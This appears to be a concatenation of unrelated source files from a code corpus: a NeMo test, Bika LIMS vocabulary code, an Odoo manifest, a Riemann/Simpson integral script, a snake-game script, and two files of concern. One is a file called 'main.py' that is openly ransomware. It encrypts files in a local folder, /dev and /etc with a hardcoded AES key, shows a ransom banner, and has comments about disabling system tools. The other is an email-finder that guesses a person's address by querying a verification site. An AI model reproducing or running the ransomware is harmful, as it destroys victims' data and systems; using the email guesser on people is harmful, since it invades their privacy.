ntype=NeuralType(elements_type=ChannelType(), axes=('B', 'D')),
)
tn = nemo.backends.pytorch.tutorials.TaylorNet(dim=4)
# note that real port's name: x was used
y_pred = tn(x=x_tg)
self.assertEqual(y_pred.producer, tn)
self.assertEqual(y_pred.producer_args.get("x"), x_tg)
def test_simple_chain(self):
data_source = nemo.backends.pytorch.tutorials.RealFunctionDataLayer(n=10000, batch_size=1)
trainable_module = nemo.backends.pytorch.tutorials.TaylorNet(dim=4)
loss = nemo.backends.pytorch.tutorials.MSELoss()
x, y = data_source()
y_pred = trainable_module(x=x)
loss_tensor = loss(predictions=y_pred, target=y)
# check producers' bookkeeping
self.assertEqual(loss_tensor.producer, loss)
self.assertEqual(loss_tensor.producer_args, {"predictions": y_pred, "target": y})
self.assertEqual(y_pred.producer, trainable_module)
self.assertEqual(y_pred.producer_args, {"x": x})
self.assertEqual(y.producer, data_source)
self.assertEqual(y.producer_args, {})
self.assertEqual(x.producer, data_source)
self.assertEqual(x.producer_args, {})
| 2.125 | 2 |
pybolt/bolt_nlp/char_cnn_classification/model.py | mikuh/pybolt | 0 | 12799086 | <gh_stars>0
import tensorflow as tf
class CharCNN(tf.keras.Model):
    def __init__(self):
        # call the Keras base initializer so the model can be instantiated;
        # the character-level CNN layers are still to be defined
        super().__init__()
| 1.859375 | 2 |
bika/lims/vocabularies/__init__.py | hocinebendou/bika.gsoc | 0 | 12799087 | <filename>bika/lims/vocabularies/__init__.py
# -*- coding:utf-8 -*-
from Acquisition import aq_get
from bika.lims import bikaMessageFactory as _
from bika.lims.utils import t
from bika.lims.interfaces import IDisplayListVocabulary, ICustomPubPref
from bika.lims.utils import to_utf8
from Products.Archetypes.public import DisplayList
from Products.CMFCore.utils import getToolByName
from zope.interface import implements
from pkg_resources import resource_filename
from plone.resource.utils import iterDirectoriesOfType
from zope.schema.interfaces import IVocabularyFactory
from zope.schema.vocabulary import SimpleTerm
from zope.schema.vocabulary import SimpleVocabulary
from zope.component import getAdapters
from zope.site.hooks import getSite
import os
import glob
class CatalogVocabulary(object):
"""Make vocabulary from catalog query.
"""
implements(IDisplayListVocabulary)
catalog = 'portal_catalog'
contentFilter = {}
key = 'UID'
value = 'Title'
def __init__(self, context, key=None, value=None, contentFilter=None):
self.context = context
self.key = key if key else self.key
self.value = value if value else self.value
self.contentFilter = \
contentFilter if contentFilter else self.contentFilter
def __call__(self, **kwargs):
site = getSite()
request = aq_get(site, 'REQUEST', None)
catalog = getToolByName(site, self.catalog)
        allow_blank = False
        if 'allow_blank' in kwargs:
            allow_blank = True
            del (kwargs['allow_blank'])
self.contentFilter.update(**kwargs)
        # If a secondary deactivation/cancellation workflow is enabled,
        # be sure to select only active objects, unless other instructions
        # are explicitly specified:
wf = getToolByName(site, 'portal_workflow')
if 'portal_type' in self.contentFilter:
portal_type = self.contentFilter['portal_type']
wf_ids = [x.id for x in wf.getWorkflowsFor(portal_type)]
if 'bika_inactive_workflow' in wf_ids \
and 'bika_inactive_workflow' not in self.contentFilter:
self.contentFilter['inactive_state'] = 'active'
elif 'bika_cancellation_workflow' in wf_ids \
and 'bika_inactive_workflow' not in self.contentFilter:
self.contentFilter['cancellation_state'] = 'active'
brains = catalog(self.contentFilter)
items = [('', '')] if allow_blank else []
for brain in brains:
if self.key in brain and self.value in brain:
key = getattr(brain, self.key)
value = getattr(brain, self.value)
else:
                obj = brain.getObject()
key = obj[self.key]
key = callable(key) and key() or key
value = obj[self.value]
value = callable(value) and value() or value
items.append((key, t(value)))
return DisplayList(items)
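# Illustrative use of CatalogVocabulary (the filter below is an assumption
# made for the sketch, not taken from this module): build a UID -> Title
# DisplayList of active Client objects, with a leading blank entry.
#   vocab = CatalogVocabulary(context, contentFilter={'portal_type': 'Client'})
#   display_list = vocab(allow_blank=True)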
class BikaContentVocabulary(object):
"""Vocabulary factory for Bika Setup objects. We find them by listing
folder contents directly.
"""
implements(IVocabularyFactory)
def __init__(self, folders, portal_types):
self.folders = isinstance(folders, (tuple, list)) and \
folders or [folders, ]
self.portal_types = isinstance(portal_types, (tuple, list)) and \
portal_types or [portal_types, ]
def __call__(self, context):
site = getSite()
request = aq_get(site, 'REQUEST', None)
items = []
wf = site.portal_workflow
for folder in self.folders:
folder = site.restrictedTraverse(folder)
for portal_type in self.portal_types:
objects = list(folder.objectValues(portal_type))
objects = [o for o in objects if
wf.getInfoFor(o, 'inactive_state') == 'active']
if not objects:
continue
objects.sort(lambda x, y: cmp(x.Title().lower(),
y.Title().lower()))
xitems = [(t(item.Title()), item.Title()) for item in objects]
xitems = [SimpleTerm(i[1], i[1], i[0]) for i in xitems]
items += xitems
return SimpleVocabulary(items)
class BikaCatalogTypesVocabulary(object):
"""Vocabulary factory for really user friendly portal types,
filtered to return only types listed as indexed by bika_catalog
"""
implements(IVocabularyFactory)
def __call__(self, context):
translate = context.translate
types = (
('AnalysisRequest', translate(to_utf8(_('Analysis Request')))),
('Batch', translate(to_utf8(_('Batch')))),
('Sample', translate(to_utf8(_('Sample')))),
('ReferenceSample', translate(to_utf8(_('Reference Sample')))),
('Worksheet', translate(to_utf8(_('Worksheet'))))
)
items = [SimpleTerm(i[0], i[0], i[1]) for i in types]
return SimpleVocabulary(items)
BikaCatalogTypesVocabularyFactory = BikaCatalogTypesVocabulary()
class AnalysisCategoryVocabulary(BikaContentVocabulary):
"""" AnalysisCategories
>>> portal = layer['portal']
>>> from plone.app.testing import TEST_USER_NAME
>>> from plone.app.testing import TEST_USER_ID
>>> from plone.app.testing import setRoles
>>> from plone.app.testing import login
>>> login(portal, TEST_USER_NAME)
>>> setRoles(portal, TEST_USER_ID, ['Manager',])
>>> from zope.component import queryUtility
>>> name = 'bika.lims.vocabularies.AnalysisCategories'
>>> util = queryUtility(IVocabularyFactory, name)
>>> folder = portal.bika_setup.bika_analysiscategories
>>> objects = folder.objectValues()
>>> len(objects)
3
>>> source = util(portal)
>>> source
<zope.schema.vocabulary.SimpleVocabulary object at ...>
>>> 'Water Chemistry' in source.by_token
True
"""
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_analysiscategories', ],
['AnalysisCategory', ])
AnalysisCategoryVocabularyFactory = AnalysisCategoryVocabulary()
class AnalysisProfileVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_analysisprofiles', ],
['AnalysisProfile', ])
AnalysisProfileVocabularyFactory = AnalysisProfileVocabulary()
class StorageLocationVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_storagelocations', ],
['StorageLocation', ])
StorageLocationVocabularyFactory = StorageLocationVocabulary()
class SamplePointVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_samplepoints', ],
['SamplePoint', ])
SamplePointVocabularyFactory = SamplePointVocabulary()
class SampleTypeVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_sampletypes', ],
['SampleType', ])
SampleTypeVocabularyFactory = SampleTypeVocabulary()
class AnalysisServiceVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_analysisservices', ],
['AnalysisService', ])
AnalysisServiceVocabularyFactory = AnalysisServiceVocabulary()
class ClientVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['clients', ],
['Client', ])
ClientVocabularyFactory = ClientVocabulary()
class UserVocabulary(object):
""" Present a vocabulary containing users in the specified
list of roles
>>> from zope.component import queryUtility
>>> portal = layer['portal']
>>> name = 'bika.lims.vocabularies.Users'
>>> util = queryUtility(IVocabularyFactory, name)
>>> tool = portal.portal_registration
>>> tool.addMember('user1', 'user1',
... properties = {
... 'username': 'user1',
... 'email': '<EMAIL>',
... 'fullname': 'user1'}
... )
<MemberData at /plone/portal_memberdata/user1 used for /plone/acl_users>
>>> source = util(portal)
>>> source
<zope.schema.vocabulary.SimpleVocabulary object at ...>
>>> 'test_user_1_' in source.by_value
True
>>> 'user1' in source.by_value
True
"""
implements(IVocabularyFactory)
def __init__(self, roles=[]):
self.roles = roles if isinstance(roles, (tuple, list)) else [roles, ]
def __call__(self, context):
site = getSite()
mtool = getToolByName(site, 'portal_membership')
users = mtool.searchForMembers(roles=self.roles)
items = [(item.getProperty('fullname'), item.getId())
for item in users]
items.sort(lambda x, y: cmp(x[0].lower(), y[0].lower()))
items = [SimpleTerm(i[1], i[1], i[0]) for i in items]
return SimpleVocabulary(items)
UserVocabularyFactory = UserVocabulary()
ClientVocabularyFactory = ClientVocabulary()
class ClientContactVocabulary(object):
""" Present Client Contacts
>>> from zope.component import queryUtility
>>> portal = layer['portal']
>>> name = 'bika.lims.vocabularies.ClientContacts'
>>> util = queryUtility(IVocabularyFactory, name)
>>> from plone.app.testing import TEST_USER_NAME
>>> from plone.app.testing import TEST_USER_ID
>>> from plone.app.testing import setRoles
>>> from plone.app.testing import login
>>> login(portal, TEST_USER_NAME)
>>> setRoles(portal, TEST_USER_ID, ['Manager',])
>>> portal.clients.invokeFactory('Client', id='client1')
'client1'
>>> client1 = portal.clients.client1
>>> client1.processForm()
>>> client1.invokeFactory('Contact', id='contact1')
'contact1'
>>> contact1 = client1.contact1
>>> contact1.processForm()
>>> contact1.edit(Firstname='Contact', Surname='One')
>>> contact1.reindexObject()
>>> source = util(portal)
>>> source
<zope.schema.vocabulary.SimpleVocabulary object at ...>
>>> 'Contact One' in source.by_value
True
"""
implements(IVocabularyFactory)
def __call__(self, context):
site = getSite()
request = aq_get(site, 'REQUEST', None)
items = []
for client in site.clients.objectValues('Client'):
objects = list(client.objectValues('Contact'))
objects.sort(lambda x, y: cmp(x.getFullname().lower(),
y.getFullname().lower()))
xitems = [(to_utf8(item.getFullname()), item.getFullname())
for item in objects]
xitems = [SimpleTerm(i[1], i[1], i[0]) for i in xitems]
items += xitems
return SimpleVocabulary(items)
ClientContactVocabularyFactory = ClientContactVocabulary()
class AnalystVocabulary(UserVocabulary):
def __init__(self):
UserVocabulary.__init__(self, roles=['Analyst', ])
AnalystVocabularyFactory = AnalystVocabulary()
class AnalysisRequestWorkflowStateVocabulary(object):
"""Vocabulary factory for workflow states.
>>> from zope.component import queryUtility
>>> portal = layer['portal']
>>> name = 'bika.lims.vocabularies.AnalysisRequestWorkflowStates'
>>> util = queryUtility(IVocabularyFactory, name)
>>> tool = getToolByName(portal, "portal_workflow")
>>> states = util(portal)
>>> states
<zope.schema.vocabulary.SimpleVocabulary object at ...>
>>> pub = states.by_token['published']
>>> pub.title, pub.token, pub.value
(u'Published', 'published', 'published')
"""
implements(IVocabularyFactory)
def __call__(self, context):
portal = getSite()
wftool = getToolByName(portal, 'portal_workflow', None)
if wftool is None:
return SimpleVocabulary([])
# XXX This is evil. A vocabulary shouldn't be request specific.
# The sorting should go into a separate widget.
# we get REQUEST from wftool because context may be an adapter
request = aq_get(wftool, 'REQUEST', None)
wf = wftool.getWorkflowById('bika_ar_workflow')
items = wftool.listWFStatesByTitle(filter_similar=True)
items_dict = dict([(i[1], t(i[0])) for i in items])
items_list = [(k, v) for k, v in items_dict.items()]
items_list.sort(lambda x, y: cmp(x[1], y[1]))
terms = [SimpleTerm(k, title=u'%s' % v) for k, v in items_list]
return SimpleVocabulary(terms)
AnalysisRequestWorkflowStateVocabularyFactory = \
AnalysisRequestWorkflowStateVocabulary()
class ARPrioritiesVocabulary(BikaContentVocabulary):
def __init__(self):
BikaContentVocabulary.__init__(self,
['bika_setup/bika_arpriorities', ],
['ARPriority', ])
def getTemplates(bikalims_path, restype):
""" Returns an array with the Templates available in the Bika LIMS path
specified plus the templates from the resources directory specified and
available on each additional product (restype).
Each array item is a dictionary with the following structure:
{'id': <template_id>,
'title': <template_title>}
If the template lives outside the bika.lims add-on, both the template_id
and template_title include a prefix that matches with the add-on
identifier. template_title is the same name as the id, but with
whitespaces and without extension.
As an example, for a template from the my.product add-on located in
<restype> resource dir, and with a filename "My_cool_report.pt", the
dictionary will look like:
{'id': 'my.product:My_cool_report.pt',
'title': 'my.product: My cool report'}
"""
# Retrieve the templates from bika.lims add-on
templates_dir = resource_filename("bika.lims", bikalims_path)
tempath = os.path.join(templates_dir, '*.pt')
templates = [os.path.split(x)[-1] for x in glob.glob(tempath)]
# Retrieve the templates from other add-ons
for templates_resource in iterDirectoriesOfType(restype):
prefix = templates_resource.__name__
if prefix == 'bika.lims':
continue
dirlist = templates_resource.listDirectory()
exts = ['{0}:{1}'.format(prefix, tpl) for tpl in dirlist if
tpl.endswith('.pt')]
templates.extend(exts)
out = []
templates.sort()
for template in templates:
title = template[:-3]
title = title.replace('_', ' ')
title = title.replace(':', ': ')
out.append({'id': template,
'title': title})
return out
def getARReportTemplates():
""" Returns an array with the AR Templates available in Bika LIMS plus the
templates from the 'reports' resources directory type from each
additional product.
Each array item is a dictionary with the following structure:
{'id': <template_id>,
'title': <template_title>}
If the template lives outside the bika.lims add-on, both the template_id
and template_title include a prefix that matches with the add-on
identifier. template_title is the same name as the id, but with
whitespaces and without extension.
As an example, for a template from the my.product add-on located in
templates/reports dir, and with a filename "My_cool_report.pt", the
dictionary will look like:
{'id': 'my.product:My_cool_report.pt',
'title': 'my.product: My cool report'}
"""
resdirname = 'reports'
p = os.path.join("browser", "analysisrequest", "templates", resdirname)
return getTemplates(p, resdirname)
class ARReportTemplatesVocabulary(object):
"""Locate all ARReport templates to allow user to set the default
"""
implements(IVocabularyFactory)
def __call__(self, context):
out = [SimpleTerm(x['id'], x['id'], x['title']) for x in
getARReportTemplates()]
return SimpleVocabulary(out)
def getStickerTemplates():
""" Returns an array with the sticker templates available. Retrieves the
TAL templates saved in templates/stickers folder.
Each array item is a dictionary with the following structure:
{'id': <template_id>,
'title': <template_title>}
If the template lives outside the bika.lims add-on, both the template_id
and template_title include a prefix that matches with the add-on
identifier. template_title is the same name as the id, but with
whitespaces and without extension.
As an example, for a template from the my.product add-on located in
templates/stickers, and with a filename "EAN128_default_small.pt", the
dictionary will look like:
{'id': 'my.product:EAN128_default_small.pt',
'title': 'my.product: EAN128 default small'}
"""
# Retrieve the templates from bika.lims add-on
resdirname = 'stickers'
p = os.path.join("browser", "templates", resdirname)
return getTemplates(p, resdirname)
class StickerTemplatesVocabulary(object):
""" Locate all sticker templates
"""
implements(IVocabularyFactory)
def __call__(self, context):
out = [SimpleTerm(x['id'], x['id'], x['title']) for x in
getStickerTemplates()]
return SimpleVocabulary(out)
ARReportTemplatesVocabularyFactory = ARReportTemplatesVocabulary()
class CustomPubPrefVocabulary(object):
implements(IVocabularyFactory)
def __call__(self, context):
items = [
(_('Email'),'email'),
(_('PDF'), 'pdf')
]
for name, item in getAdapters((context, ), ICustomPubPref):
items.append(item)
return SimpleVocabulary.fromItems(items)
CustomPubPrefVocabularyFactory = CustomPubPrefVocabulary()
| 1.765625 | 2 |
__manifest__.py | IDRISSOUM/sinerkia_jitsi_meet | 0 | 12799088 | # -*- coding: utf-8 -*-
# © 2020 Sinerkia iD (<https://www.sinerkia.com>).
{
'name': 'Sinerkia Jitsi Meet Integration',
'version': '12.0.1.0.2',
'category': 'Extra Tools',
'sequence': 1,
'summary': 'Create and share Jitsi Meet video conferences with other users and external partners',
'description': """
    Adds a new APP to create and share Jitsi Meet video conference meetings between Odoo users. You can invite external users by sending mail from Odoo.
    When you join the meeting Odoo opens a new browser tab so you can keep working on Odoo, and share your screen with your partners at Jitsi Meet.
""",
"author": "<NAME>",
"website": "https://www.sinerkia.com",
"depends": ['base','web','mail'],
"data": [
'views/sinerkia_jitsi_meet_views.xml','data/sinerkia_jitsi_meet.xml','data/mail_template.xml','security/ir.model.access.csv','security/base_security.xml',
],
'images': ['images/main_screenshot.png'],
'installable': True,
'auto_install': False,
'application': True,
'license': 'AGPL-3',
}
| 1.085938 | 1 |
integral_approximation.py | thenewpyjiang/integral-approximation-python | 1 | 12799089 | <reponame>thenewpyjiang/integral-approximation-python
from sympy.parsing.sympy_parser import parse_expr
from math import *
from sympy import *
import numpy as np
# Left endpoints integral approximation
def left(expr, left_bound, right_bound, delta_x):
x = symbols('x')
expression = parse_expr(expr)
sum = 0
for i in np.arange(left_bound, right_bound, delta_x):
sum += expression.subs(x, i)
return delta_x * sum
# Right endpoints integral approximation
def right(expr, left_bound, right_bound, delta_x):
x = symbols('x')
expression = parse_expr(expr)
sum = 0
for i in np.arange(left_bound + delta_x, right_bound + delta_x, delta_x):
sum += expression.subs(x, i)
return delta_x * sum
# Midpoints integral approximation
def mid(expr, left_bound, right_bound, delta_x):
x = symbols('x')
expression = parse_expr(expr)
sum = 0
for i in np.arange(left_bound, right_bound, delta_x):
sum += expression.subs(x, i + delta_x / 2)
return delta_x * sum
# Trapezoidal Rule for integral approximation
def trapezoidal(expr, left_bound, right_bound, delta_x):
return (left(expr, left_bound, right_bound, delta_x) \
+ right(expr, left_bound, right_bound, delta_x)) / 2
# Simpson's Rule for integral approximation
def simpson(expr, left_bound, right_bound, delta_x):
x = symbols('x')
expression = parse_expr(expr)
sum = 0
numbers = list(np.arange(left_bound, right_bound + delta_x, delta_x))
for i in range(len(numbers)):
if i == 0 or i == len(numbers) - 1:
sum += expression.subs(x, numbers[i])
elif i % 2 == 0:
sum += 2 * expression.subs(x, numbers[i])
else:
sum += 4 * expression.subs(x, numbers[i])
return delta_x * sum / 3
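# Illustrative check (added as an example, not part of the original script; never
# called automatically): Simpson's rule is exact for polynomials up to degree 3,
# so approximating the integral of x**2 over [0, 1] should give 1/3 up to
# floating-point error.
def _example_simpson_check():
    approx = simpson('x**2', 0, 1, 0.25)
    print("Simpson approximation of the integral of x**2 on [0, 1]:", approx)  # ~0.3333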
if __name__ == '__main__':
# Read input
expr = input('Expression: ')
left_bound = float(input('Left Bound: '))
right_bound = float(input('Right Bound: '))
delta_x = float(input('Delta x: '))
type = int(input('Select the type of approximation:\n \
1. Left Endpoints\n \
2. Right Endpoints\n \
3. Midpoints\n \
4. Trapezoidal Rule\n \
5. Simpson\'s Rule\n'))
# Determine which function to call
if type == 1:
print('Result:', left(expr, left_bound, right_bound, delta_x))
elif type == 2:
print('Result:', right(expr, left_bound, right_bound, delta_x))
elif type == 3:
print('Result:', mid(expr, left_bound, right_bound, delta_x))
elif type == 4:
print('Result:', trapezoidal(expr, left_bound, right_bound, delta_x))
elif type == 5:
print('Result:', simpson(expr, left_bound, right_bound, delta_x))
| 3.53125 | 4 |
main.py | brunoredes/ransomware | 0 | 12799090 | <gh_stars>0
#!/usr/bin/python3.6
# -*- coding: utf-8 -*-
from Crypto.Cipher import AES
from Crypto.Util import Counter
import argparse
import os
import Discovery
import Crypter
# -----------------
# A senha pode ter os seguintes tamanhos:
# 128/192/256 bits - 8bite = 1byte = 1 caracter unicode
# 256/8 = 32 bytes
# -----------------
HARDCODED_KEY = 'hackware strike force strikes u! '
def get_parser():
parser = argparse.ArgumentParser(description="hackwareCrypter")
parser.add_argument(
'-d', '--decrypt', help='decripta os arquivos [default: no]', action='store_true')
return parser
def main():
parser = get_parser()
args = vars(parser.parse_args())
decrypt = args['decrypt']
if decrypt:
print('''
HACKWARE STRIKE FORCE
------------------------------------------------------------
SEUS ARQUIVOS FORAM CRIPTOGRAFADOS
PARA DECRIPTÁ-LOS, UTILIZE A SEGUINTE SENHA '{}'
------------------------------------------------------------
'''.format(HARDCODED_KEY))
key = input('Digite a senha: ')
else:
if HARDCODED_KEY:
key = HARDCODED_KEY
ctr = Counter.new(256)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
if not decrypt:
cryptoFn = crypt.encrypt
else:
cryptoFn = crypt.decrypt
init_path = os.path.abspath(os.path.join(os.getcwd(), 'files'))
startDirs = [init_path, '/dev', '/etc']
for currentDir in startDirs:
for filename in Discovery.discover(currentDir):
Crypter.change_files(filename, cryptoFn)
# limpa a chave de criptografia da memoria
for _ in range(100):
pass
if not decrypt:
pass
# apos a encriptação, voce pode alterar o wallpaper
# alterar icons, desativar regedit, admin, bios, etc
if __name__ == '__main__':
main()
| 3.15625 | 3 |
apps/accounts/migrations/0015_use_dc_locations.py | denning/admin-portal | 10 | 12799091 | <filename>apps/accounts/migrations/0015_use_dc_locations.py
# Generated by Django 2.2.19 on 2021-04-15 13:14
from django.db import migrations, models
import django.db.models.deletion
import taggit.managers
class Migration(migrations.Migration):
dependencies = [
("taggit", "0003_taggeditem_add_unique_index"),
("accounts", "0014_auto_20210314_2305"),
]
operations = [
migrations.CreateModel(
name="DataCenterLocation",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("city", models.CharField(max_length=255)),
("country", models.CharField(max_length=255)),
(
"datacenter",
models.ForeignKey(
db_column="id_dc",
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="accounts.Datacenter",
),
),
],
options={
"verbose_name": "Datacentre Location",
"db_table": "datacenters_locations",
},
),
]
| 1.648438 | 2 |
emailfinder/find_email.py | forumulator/pythonScripts | 0 | 12799092 | import urllib
from urllib import request, parse
import re
import os, sys
import time
import argparse
# Request headers
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',
'Referer': 'http://www.verifyemailaddress.org',
'Origin': 'http://www.verifyemailaddress.org/',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
class EmailVerifier:
SITE_URL = 'https://www.verifyemailaddress.org/#result'
INVALID_SEARCH_STRING = "is not valid"
CONNECTING_TO_DOMAIN = "Connecting to {0} failed"
def create_request(self, email_addr):
post_form = { "email": email_addr }
enc_data = parse.urlencode(post_form).encode()
req = request.Request(
EmailVerifier.SITE_URL,
data = enc_data,
headers = headers
)
return req
def check_domain(self, domain):
req = self.create_request("help@{0}".format(domain))
resp = request.urlopen(req)
html = resp.read().decode("utf-8")
domain_invalid = EmailVerifier.CONNECTING_TO_DOMAIN.format(
domain) in html
if domain_invalid:
print(EmailVerifier.CONNECTING_TO_DOMAIN.format(
domain))
return False
else:
return True
# Returns a boolean value
def verify(self, email_addr, super_verbose = False):
req = self.create_request(email_addr)
resp = request.urlopen(req)
html = resp.read().decode("utf-8")
if super_verbose:
print(html)
re_res = EmailVerifier.INVALID_SEARCH_STRING in html
return (False if re_res else True)
# if super_verbose:
# print(re_res)
# Possible templates for different sizes
# All the possible combinations are covered by
# this and the action of the Permutator
email_templates = {
2: [
"{f}.{l}",
"{f}{l}",
],
3: [
"{f}{m}{l}",
"{f}{m}.{l}",
"{f}.{m}{l}",
"{f}.{m}.{l}"
],
1: [ "{f}" ]
}
EMAIL_FORMAT = "{user}@{domain}"
class Permutator:
""" Generate all possible combination of two and three
words to form an email. For example, (first, last), (last, first), (f, last)
The elems is produced and Permutator is called in a way such that
the emails are always produced most to least specific
eg first.last@ before f.last@ before first@
"""
def __init__(self, elems):
self.elems = elems
# Make actual permutations of elems
def make_perms(self, elems, r):
if r == 0:
yield [elems[0]]
return
for perm in self.make_perms(elems, r - 1):
for i in range(r + 1):
j = r - i
yield perm[:j] + [elems[r]] + perm[j:]
return
    # Make combinations of the given size from elems
def make_combs(self, size, l):
if (size > l + 1):
return
if size == 0:
yield []
return
if l == 0:
for elem in self.elems[0]:
yield [elem]
return
for c in self.make_combs(size, l - 1):
yield c
for elem in self.elems[l]:
for c in self.make_combs(size - 1, l - 1):
c.append(elem)
yield c
# Generate all P(n, r) permutations of r = size
def generate(self, size):
for comb in self.make_combs(size, len(self.elems) - 1):
for perm in self.make_perms(comb, len(comb) - 1):
yield perm
return
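# Illustrative helper (added as an example; the names are hypothetical and the
# function is never called by the script): shows the orderings Permutator yields
# for a two-part name, from full names down to initials.
def _demo_permutator():
    demo = Permutator([("ann", "a"), ("lee", "l")])
    for perm in demo.generate(2):
        print(perm)  # ['ann', 'lee'], ['lee', 'ann'], ['a', 'lee'], ['lee', 'a'], ...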
COLOR_GREEN = "\033[0;32m"
COLOR_RED = "\033[1;31m"
COLOR_RESET = "\033[0;0m"
def verify_for_size(f, l, m, size, verbose = False):
verifier = EmailVerifier()
for template in email_templates[size]:
user = template.format(f = f, l = l, m = m)
if len(user) < 3:
continue
try_addr = EMAIL_FORMAT.format(user = user, domain = domain)
if verbose:
print("Checking `" + try_addr + "`...", end = '', flush = True)
verif = verifier.verify(try_addr)
if verif:
print(COLOR_GREEN + "." + COLOR_RESET, end = '', flush = True)
return try_addr
else:
print(COLOR_RED + "." + COLOR_RESET, end = '', flush = True)
if verbose:
print(" ")
return None
# Sufficiently random email that nobody should
# actually have as a valid one
RANDOM_EMAIL = "prhzdge.yrtheu"
# Find the email address, given the below parameters.
# Permutes over the possible combinations of first and last name,
# including . (period), e.g. first.last@, and then checks
# each email.
def find_email(first, middle, last, domain, args):
if not EmailVerifier().check_domain(domain):
raise ValueError("Invalid domain name for email server.")
elif EmailVerifier().verify(EMAIL_FORMAT.format(user = RANDOM_EMAIL, domain = domain)):
raise ValueError("Domain seems to accept all email addresses.")
elif args.verbose:
print("Domain checks successful")
# Can use either from each of elems
elems = [ (first, first[0]), (last, last[0]) ]
if middle:
elems.append((middle, middle[0]))
email, email_list = None, []
p_gen = Permutator(elems)
# Order of lengths is 2, 3, 1
# to match most common observations
for leng in (2, 3, 1):
for perm in p_gen.generate(leng):
first = perm[0]
last = perm[1] if len(perm) > 1 else None
middle = perm[2] if len(perm) > 2 else None
email = verify_for_size(first, last, middle, leng, args.verbose)
if email:
email_list.append(email)
if not args.find_all:
return email_list
# Not found, probably works for Amazon :D
return email_list
# Automatically append .com if no tld is
# present in domain.
TLD = [".com", ".org", ".net"]
def correct_for_tld(domain):
if domain == "":
return domain
domain_flag = False
for tld in TLD:
if domain.endswith(tld):
domain_flag = True
break
if not domain_flag:
return domain + TLD[0]
else:
return domain
# Check internet connectivity, using Google
# the standard connection tester :)
google_url = "https://google.com/"
def check_connectivity():
print("Checking connection...")
try:
request.urlopen(google_url)
return True
except urllib.error.URLError:
return False
parser = argparse.ArgumentParser(
description='Find email address given a name and a domain.')
parser.add_argument('--batch', dest='batch', default = False,
action='store_true', help = "Batch mode, process multiple requests")
parser.add_argument('-v', dest='verbose', default = False,
action='store_true', help = "Verbose mode")
parser.add_argument('--all', dest='find_all', default = False,
action='store_true', help = "Find all possible addresses instead \
of stopping at the first successful")
if __name__ == "__main__":
if not check_connectivity():
print("Can't connect to internet, exiting.")
sys.exit(1)
else:
print("Connectivity okay.")
args = parser.parse_args()
loops = 1000 if args.batch else 1
input_list = []
for l in range(loops):
name = input("Name({first} {last}): ")
if name == "":
break
domain = correct_for_tld(input("Domain: "))
input_list.append((domain, name.split()))
prev_domain = ""
for domain, name_parts in input_list:
if len(name_parts) > 2:
first, middle, last = name_parts[0], name_parts[1].lower(), name_parts[2]
else:
first, last = name_parts; middle = None
if domain == "":
domain = prev_domain
try:
email_list = find_email(first.lower(), middle, last.lower(), domain, args)
print()
if len(email_list) > 0:
print("Valid Emails: ", email_list)
else:
print("Not Found")
prev_domain = domain
except ValueError as e:
print("Error: " + str(e))
sys.exit(1)
# Successful return
sys.exit(0)
| 3.140625 | 3 |
training.py | ArthurMPassos/Snake-ThurMP | 0 | 12799093 | import pygame
from random import randint
# Training variables
# Output list [Left, Up, Right, Down]
listaOutput = [0,0,0,0]
# Input list [round number, points obtained,
# board matrix] (board including
# walls, snake body and apple)
listaEntrada = [0]*3
# Note: the matrix will be almost 4 times larger than
# the board itself so that the head is centered
# and can always see the whole board
tamanho_tabuleiro_maior = 20 + 19
matriz_do_tabuleiro = [0]*tamanho_tabuleiro_maior
for i in range(20):
matriz_do_tabuleiro[i] = [0]*39
listaEntrada[2] = matriz_do_tabuleiro
# Functions to draw the head and the body
def corpoFunc(x, y):
screen.blit(imagemCorpo, (x,y))
def cabecaFunc(x, y):
screen.blit(imagemCabeca, (x,y))
# Function to draw the green background square
def quadradoFundoFunc(x, y):
screen.blit(imagemQuadradoFundo, (x,y))
# Function to draw the apple
def macaFunc(x, y):
screen.blit(imagemMaca, (x,y))
# Function for the scoreboard
def placarFunc(x,y):
placar = font.render("Pontos: " + str(pontos), True, (255, 255, 255))
screen.blit(placar, (x,y))
# Training loop
for c in range (2):
    # Initialize pygame
pygame.init()
    # Create the screen and set its size
screen = pygame.display.set_mode((600,600))
    # Title and icon
pygame.display.set_caption("Jogo da Cobrenha de ThurMP")
icone = pygame.image.load("images/snake icon.png")
fim_de_jogo = False
rodada = 0
    # Set the font
pontos = 0
font = pygame.font.Font('freesansbold.ttf', 32)
    # Create and update the background
background = pygame.image.load("images/fundo_quadriculado_verde.png")
screen.blit(background,(0,0))
    # Load the images
imagemCorpo = pygame.image.load("images/corpo.png")
imagemCabeca = pygame.image.load("images/cabeça_direita.png")
imagemQuadradoFundo = pygame.image.load("images/quadrado_do_fundo.png")
imagemMaca = pygame.image.load("images/maca1.png")
    # Initial head configuration
cabecaX = 181
cabecaY = 271
#for i in range(39):
# matriz_do_tabuleiro[(-1)//30][(-1)//30] =
    # The game starts moving to the right
cabecaXChange = 30
cabecaYChange = 0
    # Lists to keep the body positions stored
    # (already with the initial configuration)
listaXCorpo = [91, 121 ,151]
listaYCorpo = [271, 271, 271]
    # Initial body configuration
cabecaFunc(cabecaX, cabecaY)
corpoFunc(91, 271)
corpoFunc(121, 271)
corpoFunc(151, 271)
matriz_do_tabuleiro[(271-1)//30][(91-1)//30] = -1
matriz_do_tabuleiro[(271-1)//30][(121-1)//30] = -1
matriz_do_tabuleiro[(271-1)//30][(151-1)//30] = -1
    # Create the first apple and make sure it is not on the snake
macaY = (randint(0,19)*30)+1
